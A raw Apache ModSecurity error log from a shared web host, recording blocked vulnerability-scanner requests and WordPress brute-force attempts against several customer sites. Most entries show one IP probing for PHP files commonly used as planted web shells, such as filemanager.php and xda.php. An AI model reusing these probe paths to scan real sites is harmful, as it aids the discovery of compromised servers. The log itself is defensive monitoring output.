[Tue May 26 14:22:56.322518 2026] [autoindex:error] [pid 606909:tid 607139] [client 20.226.60.108:14472] AH01276: Cannot serve directory /home2/huron6a0/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:22:56.323356 2026] [security2:error] [pid 606909:tid 607139] [client 20.226.60.108:14472] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfaF0yRtX9qA7aVUVc4gAAAOk"]
[Tue May 26 14:22:56.504768 2026] [security2:error] [pid 606909:tid 607156] [client 20.226.60.108:14472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/il.php"] [unique_id "ahVfaF0yRtX9qA7aVUVc8wAAAPo"]
[Tue May 26 14:22:56.504871 2026] [security2:error] [pid 606909:tid 607156] [client 20.226.60.108:14472] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/il.php"] [unique_id "ahVfaF0yRtX9qA7aVUVc8wAAAPo"]
[Tue May 26 14:22:56.644060 2026] [security2:error] [pid 606909:tid 607127] [client 114.119.128.23:27381] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/project/boomiga-builders"] [unique_id "ahVfaF0yRtX9qA7aVUVc9wAAAN0"], referer: https://bhavisharchitects.com/interior-designer-and-architects-firms/see-our-works-architecture-interior-design
[Tue May 26 14:22:56.868183 2026] [security2:error] [pid 606909:tid 607056] [client 20.226.60.108:46595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/lite.php"] [unique_id "ahVfaF0yRtX9qA7aVUVc_AAAAJY"]
[Tue May 26 14:22:56.868271 2026] [security2:error] [pid 606909:tid 607056] [client 20.226.60.108:46595] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/lite.php"] [unique_id "ahVfaF0yRtX9qA7aVUVc_AAAAJY"]
[Tue May 26 14:22:56.982893 2026] [security2:error] [pid 606909:tid 607061] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfaF0yRtX9qA7aVUVc9gAAAJs"]
[Tue May 26 14:22:57.007174 2026] [security2:error] [pid 606909:tid 606965] [remote 121.200.216.55:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVfaF0yRtX9qA7aVUVc-AAArDc"]
[Tue May 26 14:22:57.234705 2026] [security2:error] [pid 606909:tid 607111] [client 20.226.60.108:39174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/load.php"] [unique_id "ahVfaV0yRtX9qA7aVUVdAwAAAM0"]
[Tue May 26 14:22:57.234852 2026] [security2:error] [pid 606909:tid 607111] [client 20.226.60.108:39174] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/load.php"] [unique_id "ahVfaV0yRtX9qA7aVUVdAwAAAM0"]
[Tue May 26 14:22:57.611023 2026] [security2:error] [pid 606909:tid 607130] [client 20.226.60.108:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahVfaV0yRtX9qA7aVUVdDAAAAOA"]
[Tue May 26 14:22:57.611516 2026] [security2:error] [pid 610693:tid 610901] [client 20.226.60.108:42324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/"] [unique_id "ahVfaTvNO3hpmlY6M8RS_QAAAE4"]
[Tue May 26 14:22:57.787230 2026] [security2:error] [pid 610693:tid 610903] [client 20.226.60.108:42324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-themes.php"] [unique_id "ahVfaTvNO3hpmlY6M8RTAgAAAFA"]
[Tue May 26 14:22:57.787354 2026] [security2:error] [pid 610693:tid 610903] [client 20.226.60.108:42324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-themes.php"] [unique_id "ahVfaTvNO3hpmlY6M8RTAgAAAFA"]
[Tue May 26 14:22:57.987166 2026] [security2:error] [pid 606909:tid 607112] [client 4.201.75.230:5465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/kbfr.php"] [unique_id "ahVfaV0yRtX9qA7aVUVdFAAAAM4"]
[Tue May 26 14:22:58.151370 2026] [security2:error] [pid 610693:tid 610831] [client 20.226.60.108:42328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/xda.php"] [unique_id "ahVfajvNO3hpmlY6M8RTCgAAAAg"]
[Tue May 26 14:22:58.151501 2026] [security2:error] [pid 610693:tid 610831] [client 20.226.60.108:42328] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/xda.php"] [unique_id "ahVfajvNO3hpmlY6M8RTCgAAAAg"]
[Tue May 26 14:22:58.470027 2026] [security2:error] [pid 606909:tid 607063] [client 14.139.59.212:58576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 212.59.139.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/xmlrpc.php"] [unique_id "ahVfal0yRtX9qA7aVUVdGQAAAJ0"]
[Tue May 26 14:22:58.470238 2026] [security2:error] [pid 606909:tid 607063] [client 14.139.59.212:58576] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kurgu-afrika.com"] [uri "/xmlrpc.php"] [unique_id "ahVfal0yRtX9qA7aVUVdGQAAAJ0"]
[Tue May 26 14:22:58.515085 2026] [security2:error] [pid 606909:tid 607077] [client 20.226.60.108:14442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/.trash7206/index.php"] [unique_id "ahVfal0yRtX9qA7aVUVdHQAAAKs"]
[Tue May 26 14:22:58.515197 2026] [security2:error] [pid 606909:tid 607077] [client 20.226.60.108:14442] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/.trash7206/index.php"] [unique_id "ahVfal0yRtX9qA7aVUVdHQAAAKs"]
[Tue May 26 14:22:58.867440 2026] [security2:error] [pid 610693:tid 610832] [client 20.226.60.108:19090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/doc.php"] [unique_id "ahVfajvNO3hpmlY6M8RTEwAAAAk"]
[Tue May 26 14:22:58.867541 2026] [security2:error] [pid 610693:tid 610832] [client 20.226.60.108:19090] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/doc.php"] [unique_id "ahVfajvNO3hpmlY6M8RTEwAAAAk"]
[Tue May 26 14:22:59.178442 2026] [security2:error] [pid 610693:tid 610839] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfajvNO3hpmlY6M8RTEQAAABA"]
[Tue May 26 14:22:59.220747 2026] [security2:error] [pid 610693:tid 610855] [client 20.226.60.108:39850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/storage/index.php"] [unique_id "ahVfazvNO3hpmlY6M8RTFQAAACA"]
[Tue May 26 14:22:59.220878 2026] [security2:error] [pid 610693:tid 610855] [client 20.226.60.108:39850] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/storage/index.php"] [unique_id "ahVfazvNO3hpmlY6M8RTFQAAACA"]
[Tue May 26 14:22:59.571507 2026] [security2:error] [pid 610693:tid 610858] [client 202.141.83.254:5638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfazvNO3hpmlY6M8RTGgAAACM"]
[Tue May 26 14:22:59.571661 2026] [security2:error] [pid 610693:tid 610858] [client 202.141.83.254:5638] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfazvNO3hpmlY6M8RTGgAAACM"]
[Tue May 26 14:22:59.581249 2026] [security2:error] [pid 606909:tid 607080] [client 20.226.60.108:22359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content.php"] [unique_id "ahVfa10yRtX9qA7aVUVdLAAAAK4"]
[Tue May 26 14:22:59.581357 2026] [security2:error] [pid 606909:tid 607080] [client 20.226.60.108:22359] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content.php"] [unique_id "ahVfa10yRtX9qA7aVUVdLAAAAK4"]
[Tue May 26 14:22:59.680452 2026] [security2:error] [pid 606909:tid 607087] [client 167.235.143.113:54744] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVfa10yRtX9qA7aVUVdMQAAALU"], referer: https://thegoodsporting.com
[Tue May 26 14:22:59.933695 2026] [security2:error] [pid 606909:tid 607131] [client 20.226.60.108:48889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/ID3/index.php"] [unique_id "ahVfa10yRtX9qA7aVUVdOgAAAOE"]
[Tue May 26 14:22:59.933817 2026] [security2:error] [pid 606909:tid 607131] [client 20.226.60.108:48889] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/ID3/index.php"] [unique_id "ahVfa10yRtX9qA7aVUVdOgAAAOE"]
[Tue May 26 14:23:00.316408 2026] [autoindex:error] [pid 606909:tid 607123] [client 20.226.60.108:0] AH01276: Cannot serve directory /home2/huron6a0/public_html/wp-includes/block-bindings/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:23:00.317152 2026] [security2:error] [pid 606909:tid 607123] [client 20.226.60.108:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfbF0yRtX9qA7aVUVdSQAAANk"]
[Tue May 26 14:23:00.317560 2026] [security2:error] [pid 606909:tid 607088] [client 20.226.60.108:60612] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/block-bindings/"] [unique_id "ahVfbF0yRtX9qA7aVUVdRwAAALY"]
[Tue May 26 14:23:00.503604 2026] [security2:error] [pid 606909:tid 607108] [client 20.226.60.108:60612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/min.php"] [unique_id "ahVfbF0yRtX9qA7aVUVdSwAAAMo"]
[Tue May 26 14:23:00.503711 2026] [security2:error] [pid 606909:tid 607108] [client 20.226.60.108:60612] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/min.php"] [unique_id "ahVfbF0yRtX9qA7aVUVdSwAAAMo"]
[Tue May 26 14:23:00.855201 2026] [security2:error] [pid 606909:tid 607128] [client 85.208.96.199:44894] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahVfbF0yRtX9qA7aVUVdVQAAAN4"]
[Tue May 26 14:23:00.855317 2026] [security2:error] [pid 606909:tid 607128] [client 85.208.96.199:44894] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahVfbF0yRtX9qA7aVUVdVQAAAN4"]
[Tue May 26 14:23:00.856096 2026] [security2:error] [pid 610693:tid 610870] [client 20.226.60.108:14508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/cache.php"] [unique_id "ahVfbDvNO3hpmlY6M8RTIAAAAC8"]
[Tue May 26 14:23:00.856198 2026] [security2:error] [pid 610693:tid 610870] [client 20.226.60.108:14508] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/cache.php"] [unique_id "ahVfbDvNO3hpmlY6M8RTIAAAAC8"]
[Tue May 26 14:23:01.171407 2026] [security2:error] [pid 606909:tid 607159] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfbF0yRtX9qA7aVUVdVAAAAP0"]
[Tue May 26 14:23:01.220359 2026] [security2:error] [pid 606909:tid 607083] [client 20.226.60.108:14433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/filemanager.php"] [unique_id "ahVfbV0yRtX9qA7aVUVdXgAAALE"]
[Tue May 26 14:23:01.220462 2026] [security2:error] [pid 606909:tid 607083] [client 20.226.60.108:14433] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/filemanager.php"] [unique_id "ahVfbV0yRtX9qA7aVUVdXgAAALE"]
[Tue May 26 14:23:01.461048 2026] [security2:error] [pid 606909:tid 606959] [remote 173.249.15.100:45074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVfbV0yRtX9qA7aVUVdXwAAozE"]
[Tue May 26 14:23:01.584489 2026] [security2:error] [pid 606909:tid 607104] [client 20.226.60.108:39197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-blog.php"] [unique_id "ahVfbV0yRtX9qA7aVUVdZQAAAMY"]
[Tue May 26 14:23:01.584596 2026] [security2:error] [pid 606909:tid 607104] [client 20.226.60.108:39197] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-blog.php"] [unique_id "ahVfbV0yRtX9qA7aVUVdZQAAAMY"]
[Tue May 26 14:23:01.971733 2026] [autoindex:error] [pid 610693:tid 610929] [client 20.226.60.108:0] AH01276: Cannot serve directory /home2/huron6a0/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:23:01.972428 2026] [security2:error] [pid 610693:tid 610929] [client 20.226.60.108:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfbTvNO3hpmlY6M8RTLwAAAGo"]
[Tue May 26 14:23:01.972855 2026] [security2:error] [pid 606909:tid 607078] [client 20.226.60.108:48832] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/ID3/"] [unique_id "ahVfbV0yRtX9qA7aVUVdaAAAAKw"]
[Tue May 26 14:23:02.418545 2026] [security2:error] [pid 606909:tid 607064] [client 20.226.60.108:48832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/xmlrpc.php"] [unique_id "ahVfbl0yRtX9qA7aVUVdcQAAAJ4"]
[Tue May 26 14:23:02.418692 2026] [security2:error] [pid 606909:tid 607064] [client 20.226.60.108:48832] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/xmlrpc.php"] [unique_id "ahVfbl0yRtX9qA7aVUVdcQAAAJ4"]
[Tue May 26 14:23:02.786436 2026] [security2:error] [pid 606909:tid 607068] [client 20.226.60.108:22392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/cd.php"] [unique_id "ahVfbl0yRtX9qA7aVUVdeQAAAKI"]
[Tue May 26 14:23:02.786563 2026] [security2:error] [pid 606909:tid 607068] [client 20.226.60.108:22392] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/cd.php"] [unique_id "ahVfbl0yRtX9qA7aVUVdeQAAAKI"]
[Tue May 26 14:23:03.152330 2026] [security2:error] [pid 606909:tid 607042] [client 20.226.60.108:19116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/css.php"] [unique_id "ahVfb10yRtX9qA7aVUVdgAAAAIg"]
[Tue May 26 14:23:03.152518 2026] [security2:error] [pid 606909:tid 607042] [client 20.226.60.108:19116] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/css.php"] [unique_id "ahVfb10yRtX9qA7aVUVdgAAAAIg"]
[Tue May 26 14:23:03.234533 2026] [security2:error] [pid 606909:tid 607084] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfbl0yRtX9qA7aVUVdewAAALI"]
[Tue May 26 14:23:03.521544 2026] [security2:error] [pid 610693:tid 610827] [client 20.226.60.108:46601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/lu4.php"] [unique_id "ahVfbzvNO3hpmlY6M8RTPwAAAAQ"]
[Tue May 26 14:23:03.521684 2026] [security2:error] [pid 610693:tid 610827] [client 20.226.60.108:46601] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/lu4.php"] [unique_id "ahVfbzvNO3hpmlY6M8RTPwAAAAQ"]
[Tue May 26 14:23:03.887756 2026] [security2:error] [pid 606909:tid 607077] [client 20.226.60.108:14450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahVfb10yRtX9qA7aVUVdigAAAKs"]
